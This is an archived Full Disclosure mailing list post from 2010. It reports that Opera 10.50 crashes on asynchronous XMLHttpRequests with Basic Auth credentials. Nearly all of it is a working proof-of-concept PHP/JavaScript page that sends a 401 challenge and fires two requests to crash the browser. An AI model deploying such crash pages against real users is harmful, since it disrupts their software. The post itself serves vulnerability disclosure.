Full Disclosure mailing list archives
Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash
From: spam account <peorth_17 () hotmail com>
Date: Thu, 4 Mar 2010 15:53:59 -0600
First found it in one of the version 9 opera's and reported it, still works in 10.50. <?php if (isset($_GET['crash'])) { header('HTTP/1.0 401 Unauthorized'); header('WWW-Authenticate: Basic realm="crash"'); exit(); } ?> <!DOCTYPE html> <html> <head> <title>Crash Opera</title> <script> function doit() { a = new XMLHttpRequest() a.open("GET", "?crash", true, "crash", "crash"); a.send(null); } function crash() { doit(); doit(); } </script> </head> <body> <input type="submit" onclick="crash()" value="Crash Opera"> </body> </html> _________________________________________________________________ Hotmail: Trusted email with Microsoft’s powerful SPAM protection. http://clk.atdmt.com/GBL/go/201469226/direct/01/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash spam account (Mar 05)